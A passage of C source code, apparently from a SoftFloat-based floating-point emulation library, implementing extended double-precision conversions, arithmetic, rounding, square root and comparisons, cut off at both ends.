( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { if (float64_is_signaling_nan(a, status) || float64_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat64Sign( a ); bSign = extractFloat64Sign( b ); av = float64_val(a); bv = float64_val(b); if ( aSign != bSign ) return aSign && ( (uint64_t) ( ( av | bv )<<1 ) != 0 ); return ( av != bv ) && ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The | comparison is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_unordered_quiet(float64 a, float64 b, float_status *status) { a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { if (float64_is_signaling_nan(a, status) || float64_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the 32-bit two's complement integer format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic---which means in particular that the conversion | is rounded according to the current rounding mode. If `a' is a NaN, the | largest positive integer is returned. Otherwise, if the conversion | overflows, the largest integer with the same sign as `a' is returned. *----------------------------------------------------------------------------*/ int32_t floatx80_to_int32(floatx80 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return 1 << 31; } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) aSign = 0; shiftCount = 0x4037 - aExp; if ( shiftCount <= 0 ) shiftCount = 1; shift64RightJamming( aSig, shiftCount, &aSig ); return roundAndPackInt32(aSign, aSig, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the 32-bit two's complement integer format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic, except that the conversion is always rounded | toward zero. If `a' is a NaN, the largest positive integer is returned. | Otherwise, if the conversion overflows, the largest integer with the same | sign as `a' is returned. *----------------------------------------------------------------------------*/ int32_t floatx80_to_int32_round_to_zero(floatx80 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig, savedASig; int32_t z; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return 1 << 31; } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( 0x401E < aExp ) { if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) aSign = 0; goto invalid; } else if ( aExp < 0x3FFF ) { if (aExp || aSig) { status->float_exception_flags |= float_flag_inexact; } return 0; } shiftCount = 0x403E - aExp; savedASig = aSig; aSig >>= shiftCount; z = aSig; if ( aSign ) z = - z; if ( ( z < 0 ) ^ aSign ) { invalid: float_raise(float_flag_invalid, status); return aSign ? (int32_t) 0x80000000 : 0x7FFFFFFF; } if ( ( aSig<<shiftCount ) != savedASig ) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the 64-bit two's complement integer format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic---which means in particular that the conversion | is rounded according to the current rounding mode. If `a' is a NaN, | the largest positive integer is returned. Otherwise, if the conversion | overflows, the largest integer with the same sign as `a' is returned. *----------------------------------------------------------------------------*/ int64_t floatx80_to_int64(floatx80 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig, aSigExtra; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return 1ULL << 63; } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); shiftCount = 0x403E - aExp; if ( shiftCount <= 0 ) { if ( shiftCount ) { float_raise(float_flag_invalid, status); if (!aSign || floatx80_is_any_nan(a)) { return INT64_MAX; } return INT64_MIN; } aSigExtra = 0; } else { shift64ExtraRightJamming( aSig, 0, shiftCount, &aSig, &aSigExtra ); } return roundAndPackInt64(aSign, aSig, aSigExtra, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the 64-bit two's complement integer format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic, except that the conversion is always rounded | toward zero. If `a' is a NaN, the largest positive integer is returned. | Otherwise, if the conversion overflows, the largest integer with the same | sign as `a' is returned. *----------------------------------------------------------------------------*/ int64_t floatx80_to_int64_round_to_zero(floatx80 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig; int64_t z; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return 1ULL << 63; } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); shiftCount = aExp - 0x403E; if ( 0 <= shiftCount ) { aSig &= UINT64_C(0x7FFFFFFFFFFFFFFF); if ( ( a.high != 0xC03E ) || aSig ) { float_raise(float_flag_invalid, status); if ( ! aSign || ( ( aExp == 0x7FFF ) && aSig ) ) { return INT64_MAX; } } return INT64_MIN; } else if ( aExp < 0x3FFF ) { if (aExp | aSig) { status->float_exception_flags |= float_flag_inexact; } return 0; } z = aSig>>( - shiftCount ); if ( (uint64_t) ( aSig<<( shiftCount & 63 ) ) ) { status->float_exception_flags |= float_flag_inexact; } if ( aSign ) z = - z; return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the single-precision floating-point format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float32 floatx80_to_float32(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return float32_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( aExp == 0x7FFF ) { if ( (uint64_t) ( aSig<<1 ) ) { return commonNaNToFloat32(floatx80ToCommonNaN(a, status), status); } return packFloat32( aSign, 0xFF, 0 ); } shift64RightJamming( aSig, 33, &aSig ); if ( aExp || aSig ) aExp -= 0x3F81; return roundAndPackFloat32(aSign, aExp, aSig, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the double-precision floating-point format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float64 floatx80_to_float64(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig, zSig; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return float64_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( aExp == 0x7FFF ) { if ( (uint64_t) ( aSig<<1 ) ) { return commonNaNToFloat64(floatx80ToCommonNaN(a, status), status); } return packFloat64( aSign, 0x7FF, 0 ); } shift64RightJamming( aSig, 1, &zSig ); if ( aExp || aSig ) aExp -= 0x3C01; return roundAndPackFloat64(aSign, aExp, zSig, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the quadruple-precision floating-point format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 floatx80_to_float128(floatx80 a, float_status *status) { flag aSign; int aExp; uint64_t aSig, zSig0, zSig1; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return float128_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) { return commonNaNToFloat128(floatx80ToCommonNaN(a, status), status); } shift128Right( aSig<<1, 0, 16, &zSig0, &zSig1 ); return packFloat128( aSign, aExp, zSig0, zSig1 ); } /*---------------------------------------------------------------------------- | Rounds the extended double-precision floating-point value `a' | to the precision provided by floatx80_rounding_precision and returns the | result as an extended double-precision floating-point value. | The operation is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_round(floatx80 a, float_status *status) { return roundAndPackFloatx80(status->floatx80_rounding_precision, extractFloatx80Sign(a), extractFloatx80Exp(a), extractFloatx80Frac(a), 0, status); } /*---------------------------------------------------------------------------- | Rounds the extended double-precision floating-point value `a' to an integer, | and returns the result as an extended quadruple-precision floating-point | value. The operation is performed according to the IEC/IEEE Standard for | Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_round_to_int(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t lastBitMask, roundBitsMask; floatx80 z; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aExp = extractFloatx80Exp( a ); if ( 0x403E <= aExp ) { if ( ( aExp == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) { return propagateFloatx80NaN(a, a, status); } return a; } if ( aExp < 0x3FFF ) { if ( ( aExp == 0 ) && ( (uint64_t) ( extractFloatx80Frac( a )<<1 ) == 0 ) ) { return a; } status->float_exception_flags |= float_flag_inexact; aSign = extractFloatx80Sign( a ); switch (status->float_rounding_mode) { case float_round_nearest_even: if ( ( aExp == 0x3FFE ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) { return packFloatx80( aSign, 0x3FFF, UINT64_C(0x8000000000000000)); } break; case float_round_ties_away: if (aExp == 0x3FFE) { return packFloatx80(aSign, 0x3FFF, UINT64_C(0x8000000000000000)); } break; case float_round_down: return aSign ? packFloatx80( 1, 0x3FFF, UINT64_C(0x8000000000000000)) : packFloatx80( 0, 0, 0 ); case float_round_up: return aSign ? packFloatx80( 1, 0, 0 ) : packFloatx80( 0, 0x3FFF, UINT64_C(0x8000000000000000)); } return packFloatx80( aSign, 0, 0 ); } lastBitMask = 1; lastBitMask <<= 0x403E - aExp; roundBitsMask = lastBitMask - 1; z = a; switch (status->float_rounding_mode) { case float_round_nearest_even: z.low += lastBitMask>>1; if ((z.low & roundBitsMask) == 0) { z.low &= ~lastBitMask; } break; case float_round_ties_away: z.low += lastBitMask >> 1; break; case float_round_to_zero: break; case float_round_up: if (!extractFloatx80Sign(z)) { z.low += roundBitsMask; } break; case float_round_down: if (extractFloatx80Sign(z)) { z.low += roundBitsMask; } break; default: abort(); } z.low &= ~ roundBitsMask; if ( z.low == 0 ) { ++z.high; z.low = UINT64_C(0x8000000000000000); } if (z.low != a.low) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Returns the result of adding the absolute values of the extended double- | precision floating-point values `a' and `b'. If `zSign' is 1, the sum is | negated before being returned. `zSign' is ignored if the result is a NaN. | The addition is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static floatx80 addFloatx80Sigs(floatx80 a, floatx80 b, flag zSign, float_status *status) { int32_t aExp, bExp, zExp; uint64_t aSig, bSig, zSig0, zSig1; int32_t expDiff; aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); bSig = extractFloatx80Frac( b ); bExp = extractFloatx80Exp( b ); expDiff = aExp - bExp; if ( 0 < expDiff ) { if ( aExp == 0x7FFF ) { if ((uint64_t)(aSig << 1)) { return propagateFloatx80NaN(a, b, status); } return a; } if ( bExp == 0 ) --expDiff; shift64ExtraRightJamming( bSig, 0, expDiff, &bSig, &zSig1 ); zExp = aExp; } else if ( expDiff < 0 ) { if ( bExp == 0x7FFF ) { if ((uint64_t)(bSig << 1)) { return propagateFloatx80NaN(a, b, status); } return packFloatx80(zSign, floatx80_infinity_high, floatx80_infinity_low); } if ( aExp == 0 ) ++expDiff; shift64ExtraRightJamming( aSig, 0, - expDiff, &aSig, &zSig1 ); zExp = bExp; } else { if ( aExp == 0x7FFF ) { if ( (uint64_t) ( ( aSig | bSig )<<1 ) ) { return propagateFloatx80NaN(a, b, status); } return a; } zSig1 = 0; zSig0 = aSig + bSig; if ( aExp == 0 ) { if (zSig0 == 0) { return packFloatx80(zSign, 0, 0); } normalizeFloatx80Subnormal( zSig0, &zExp, &zSig0 ); goto roundAndPack; } zExp = aExp; goto shiftRight1; } zSig0 = aSig + bSig; if ( (int64_t) zSig0 < 0 ) goto roundAndPack; shiftRight1: shift64ExtraRightJamming( zSig0, zSig1, 1, &zSig0, &zSig1 ); zSig0 |= UINT64_C(0x8000000000000000); ++zExp; roundAndPack: return roundAndPackFloatx80(status->floatx80_rounding_precision, zSign, zExp, zSig0, zSig1, status); } /*---------------------------------------------------------------------------- | Returns the result of subtracting the absolute values of the extended | double-precision floating-point values `a' and `b'. If `zSign' is 1, the | difference is negated before being returned. `zSign' is ignored if the | result is a NaN. The subtraction is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static floatx80 subFloatx80Sigs(floatx80 a, floatx80 b, flag zSign, float_status *status) { int32_t aExp, bExp, zExp; uint64_t aSig, bSig, zSig0, zSig1; int32_t expDiff; aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); bSig = extractFloatx80Frac( b ); bExp = extractFloatx80Exp( b ); expDiff = aExp - bExp; if ( 0 < expDiff ) goto aExpBigger; if ( expDiff < 0 ) goto bExpBigger; if ( aExp == 0x7FFF ) { if ( (uint64_t) ( ( aSig | bSig )<<1 ) ) { return propagateFloatx80NaN(a, b, status); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if ( aExp == 0 ) { aExp = 1; bExp = 1; } zSig1 = 0; if ( bSig < aSig ) goto aBigger; if ( aSig < bSig ) goto bBigger; return packFloatx80(status->float_rounding_mode == float_round_down, 0, 0); bExpBigger: if ( bExp == 0x7FFF ) { if ((uint64_t)(bSig << 1)) { return propagateFloatx80NaN(a, b, status); } return packFloatx80(zSign ^ 1, floatx80_infinity_high, floatx80_infinity_low); } if ( aExp == 0 ) ++expDiff; shift128RightJamming( aSig, 0, - expDiff, &aSig, &zSig1 ); bBigger: sub128( bSig, 0, aSig, zSig1, &zSig0, &zSig1 ); zExp = bExp; zSign ^= 1; goto normalizeRoundAndPack; aExpBigger: if ( aExp == 0x7FFF ) { if ((uint64_t)(aSig << 1)) { return propagateFloatx80NaN(a, b, status); } return a; } if ( bExp == 0 ) --expDiff; shift128RightJamming( bSig, 0, expDiff, &bSig, &zSig1 ); aBigger: sub128( aSig, 0, bSig, zSig1, &zSig0, &zSig1 ); zExp = aExp; normalizeRoundAndPack: return normalizeRoundAndPackFloatx80(status->floatx80_rounding_precision, zSign, zExp, zSig0, zSig1, status); } /*---------------------------------------------------------------------------- | Returns the result of adding the extended double-precision floating-point | values `a' and `b'. The operation is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_add(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aSign = extractFloatx80Sign( a ); bSign = extractFloatx80Sign( b ); if ( aSign == bSign ) { return addFloatx80Sigs(a, b, aSign, status); } else { return subFloatx80Sigs(a, b, aSign, status); } } /*---------------------------------------------------------------------------- | Returns the result of subtracting the extended double-precision floating- | point values `a' and `b'. The operation is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_sub(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aSign = extractFloatx80Sign( a ); bSign = extractFloatx80Sign( b ); if ( aSign == bSign ) { return subFloatx80Sigs(a, b, aSign, status); } else { return addFloatx80Sigs(a, b, aSign, status); } } /*---------------------------------------------------------------------------- | Returns the result of multiplying the extended double-precision floating- | point values `a' and `b'. The operation is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_mul(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign, zSign; int32_t aExp, bExp, zExp; uint64_t aSig, bSig, zSig0, zSig1; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); bSig = extractFloatx80Frac( b ); bExp = extractFloatx80Exp( b ); bSign = extractFloatx80Sign( b ); zSign = aSign ^ bSign; if ( aExp == 0x7FFF ) { if ( (uint64_t) ( aSig<<1 ) || ( ( bExp == 0x7FFF ) && (uint64_t) ( bSig<<1 ) ) ) { return propagateFloatx80NaN(a, b, status); } if ( ( bExp | bSig ) == 0 ) goto invalid; return packFloatx80(zSign, floatx80_infinity_high, floatx80_infinity_low); } if ( bExp == 0x7FFF ) { if ((uint64_t)(bSig << 1)) { return propagateFloatx80NaN(a, b, status); } if ( ( aExp | aSig ) == 0 ) { invalid: float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } return packFloatx80(zSign, floatx80_infinity_high, floatx80_infinity_low); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloatx80( zSign, 0, 0 ); normalizeFloatx80Subnormal( aSig, &aExp, &aSig ); } if ( bExp == 0 ) { if ( bSig == 0 ) return packFloatx80( zSign, 0, 0 ); normalizeFloatx80Subnormal( bSig, &bExp, &bSig ); } zExp = aExp + bExp - 0x3FFE; mul64To128( aSig, bSig, &zSig0, &zSig1 ); if ( 0 < (int64_t) zSig0 ) { shortShift128Left( zSig0, zSig1, 1, &zSig0, &zSig1 ); --zExp; } return roundAndPackFloatx80(status->floatx80_rounding_precision, zSign, zExp, zSig0, zSig1, status); } /*---------------------------------------------------------------------------- | Returns the result of dividing the extended double-precision floating-point | value `a' by the corresponding value `b'. The operation is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_div(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign, zSign; int32_t aExp, bExp, zExp; uint64_t aSig, bSig, zSig0, zSig1; uint64_t rem0, rem1, rem2, term0, term1, term2; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); bSig = extractFloatx80Frac( b ); bExp = extractFloatx80Exp( b ); bSign = extractFloatx80Sign( b ); zSign = aSign ^ bSign; if ( aExp == 0x7FFF ) { if ((uint64_t)(aSig << 1)) { return propagateFloatx80NaN(a, b, status); } if ( bExp == 0x7FFF ) { if ((uint64_t)(bSig << 1)) { return propagateFloatx80NaN(a, b, status); } goto invalid; } return packFloatx80(zSign, floatx80_infinity_high, floatx80_infinity_low); } if ( bExp == 0x7FFF ) { if ((uint64_t)(bSig << 1)) { return propagateFloatx80NaN(a, b, status); } return packFloatx80( zSign, 0, 0 ); } if ( bExp == 0 ) { if ( bSig == 0 ) { if ( ( aExp | aSig ) == 0 ) { invalid: float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } float_raise(float_flag_divbyzero, status); return packFloatx80(zSign, floatx80_infinity_high, floatx80_infinity_low); } normalizeFloatx80Subnormal( bSig, &bExp, &bSig ); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloatx80( zSign, 0, 0 ); normalizeFloatx80Subnormal( aSig, &aExp, &aSig ); } zExp = aExp - bExp + 0x3FFE; rem1 = 0; if ( bSig <= aSig ) { shift128Right( aSig, 0, 1, &aSig, &rem1 ); ++zExp; } zSig0 = estimateDiv128To64( aSig, rem1, bSig ); mul64To128( bSig, zSig0, &term0, &term1 ); sub128( aSig, rem1, term0, term1, &rem0, &rem1 ); while ( (int64_t) rem0 < 0 ) { --zSig0; add128( rem0, rem1, 0, bSig, &rem0, &rem1 ); } zSig1 = estimateDiv128To64( rem1, 0, bSig ); if ( (uint64_t) ( zSig1<<1 ) <= 8 ) { mul64To128( bSig, zSig1, &term1, &term2 ); sub128( rem1, 0, term1, term2, &rem1, &rem2 ); while ( (int64_t) rem1 < 0 ) { --zSig1; add128( rem1, rem2, 0, bSig, &rem1, &rem2 ); } zSig1 |= ( ( rem1 | rem2 ) != 0 ); } return roundAndPackFloatx80(status->floatx80_rounding_precision, zSign, zExp, zSig0, zSig1, status); } /*---------------------------------------------------------------------------- | Returns the remainder of the extended double-precision floating-point value | `a' with respect to the corresponding value `b'. The operation is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_rem(floatx80 a, floatx80 b, float_status *status) { flag aSign, zSign; int32_t aExp, bExp, expDiff; uint64_t aSig0, aSig1, bSig; uint64_t q, term0, term1, alternateASig0, alternateASig1; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aSig0 = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); bSig = extractFloatx80Frac( b ); bExp = extractFloatx80Exp( b ); if ( aExp == 0x7FFF ) { if ( (uint64_t) ( aSig0<<1 ) || ( ( bExp == 0x7FFF ) && (uint64_t) ( bSig<<1 ) ) ) { return propagateFloatx80NaN(a, b, status); } goto invalid; } if ( bExp == 0x7FFF ) { if ((uint64_t)(bSig << 1)) { return propagateFloatx80NaN(a, b, status); } return a; } if ( bExp == 0 ) { if ( bSig == 0 ) { invalid: float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } normalizeFloatx80Subnormal( bSig, &bExp, &bSig ); } if ( aExp == 0 ) { if ( (uint64_t) ( aSig0<<1 ) == 0 ) return a; normalizeFloatx80Subnormal( aSig0, &aExp, &aSig0 ); } bSig |= UINT64_C(0x8000000000000000); zSign = aSign; expDiff = aExp - bExp; aSig1 = 0; if ( expDiff < 0 ) { if ( expDiff < -1 ) return a; shift128Right( aSig0, 0, 1, &aSig0, &aSig1 ); expDiff = 0; } q = ( bSig <= aSig0 ); if ( q ) aSig0 -= bSig; expDiff -= 64; while ( 0 < expDiff ) { q = estimateDiv128To64( aSig0, aSig1, bSig ); q = ( 2 < q ) ? q - 2 : 0; mul64To128( bSig, q, &term0, &term1 ); sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 ); shortShift128Left( aSig0, aSig1, 62, &aSig0, &aSig1 ); expDiff -= 62; } expDiff += 64; if ( 0 < expDiff ) { q = estimateDiv128To64( aSig0, aSig1, bSig ); q = ( 2 < q ) ? q - 2 : 0; q >>= 64 - expDiff; mul64To128( bSig, q<<( 64 - expDiff ), &term0, &term1 ); sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 ); shortShift128Left( 0, bSig, 64 - expDiff, &term0, &term1 ); while ( le128( term0, term1, aSig0, aSig1 ) ) { ++q; sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 ); } } else { term1 = 0; term0 = bSig; } sub128( term0, term1, aSig0, aSig1, &alternateASig0, &alternateASig1 ); if ( lt128( alternateASig0, alternateASig1, aSig0, aSig1 ) || ( eq128( alternateASig0, alternateASig1, aSig0, aSig1 ) && ( q & 1 ) ) ) { aSig0 = alternateASig0; aSig1 = alternateASig1; zSign = ! zSign; } return normalizeRoundAndPackFloatx80( 80, zSign, bExp + expDiff, aSig0, aSig1, status); } /*---------------------------------------------------------------------------- | Returns the square root of the extended double-precision floating-point | value `a'. The operation is performed according to the IEC/IEEE Standard | for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 floatx80_sqrt(floatx80 a, float_status *status) { flag aSign; int32_t aExp, zExp; uint64_t aSig0, aSig1, zSig0, zSig1, doubleZSig0; uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aSig0 = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( aExp == 0x7FFF ) { if ((uint64_t)(aSig0 << 1)) { return propagateFloatx80NaN(a, a, status); } if ( ! aSign ) return a; goto invalid; } if ( aSign ) { if ( ( aExp | aSig0 ) == 0 ) return a; invalid: float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if ( aExp == 0 ) { if ( aSig0 == 0 ) return packFloatx80( 0, 0, 0 ); normalizeFloatx80Subnormal( aSig0, &aExp, &aSig0 ); } zExp = ( ( aExp - 0x3FFF )>>1 ) + 0x3FFF; zSig0 = estimateSqrt32( aExp, aSig0>>32 ); shift128Right( aSig0, 0, 2 + ( aExp & 1 ), &aSig0, &aSig1 ); zSig0 = estimateDiv128To64( aSig0, aSig1, zSig0<<32 ) + ( zSig0<<30 ); doubleZSig0 = zSig0<<1; mul64To128( zSig0, zSig0, &term0, &term1 ); sub128( aSig0, aSig1, term0, term1, &rem0, &rem1 ); while ( (int64_t) rem0 < 0 ) { --zSig0; doubleZSig0 -= 2; add128( rem0, rem1, zSig0>>63, doubleZSig0 | 1, &rem0, &rem1 ); } zSig1 = estimateDiv128To64( rem1, 0, doubleZSig0 ); if ( ( zSig1 & UINT64_C(0x3FFFFFFFFFFFFFFF) ) <= 5 ) { if ( zSig1 == 0 ) zSig1 = 1; mul64To128( doubleZSig0, zSig1, &term1, &term2 ); sub128( rem1, 0, term1, term2, &rem1, &rem2 ); mul64To128( zSig1, zSig1, &term2, &term3 ); sub192( rem1, rem2, 0, 0, term2, term3, &rem1, &rem2, &rem3 ); while ( (int64_t) rem1 < 0 ) { --zSig1; shortShift128Left( 0, zSig1, 1, &term2, &term3 ); term3 |= 1; term2 |= doubleZSig0; add192( rem1, rem2, rem3, 0, term2, term3, &rem1, &rem2, &rem3 ); } zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); } shortShift128Left( 0, zSig1, 1, &zSig0, &zSig1 ); zSig0 |= doubleZSig0; return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, zExp, zSig0, zSig1, status); } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is equal | to the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. Otherwise, the comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int floatx80_eq(floatx80 a, floatx80 b, float_status *status) { if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b) || (extractFloatx80Exp(a) == 0x7FFF && (uint64_t) (extractFloatx80Frac(a) << 1)) || (extractFloatx80Exp(b) == 0x7FFF && (uint64_t) (extractFloatx80Frac(b) << 1)) ) { float_raise(float_flag_invalid, status); return 0; } return ( a.low == b.low ) && ( ( a.high == b.high ) || ( ( a.low == 0 ) && ( (uint16_t) ( ( a.high | b.high )<<1 ) == 0 ) ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is | less than or equal to the corresponding value `b', and 0 otherwise. The | invalid exception is raised if either operand is a NaN. The comparison is | performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ int floatx80_le(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b) || (extractFloatx80Exp(a) == 0x7FFF && (uint64_t) (extractFloatx80Frac(a) << 1)) || (extractFloatx80Exp(b) == 0x7FFF && (uint64_t) (extractFloatx80Frac(b) << 1)) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloatx80Sign( a ); bSign = extractFloatx80Sign( b ); if ( aSign != bSign ) { return aSign || ( ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) == 0 ); } return aSign ? le128( b.high, b.low, a.high, a.low ) : le128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is | less than the corresponding value `b', and 0 otherwise. The invalid | exception is raised if either operand is a NaN. The comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int floatx80_lt(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b) || (extractFloatx80Exp(a) == 0x7FFF && (uint64_t) (extractFloatx80Frac(a) << 1)) || (extractFloatx80Exp(b) == 0x7FFF && (uint64_t) (extractFloatx80Frac(b) << 1)) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloatx80Sign( a ); bSign = extractFloatx80Sign( b ); if ( aSign != bSign ) { return aSign && ( ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) != 0 ); } return aSign ? lt128( b.high, b.low, a.high, a.low ) : lt128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point values `a' and `b' | cannot be compared, and 0 otherwise. The invalid exception is raised if | either operand is a NaN. The comparison is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int floatx80_unordered(floatx80 a, floatx80 b, float_status *status) { if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b) 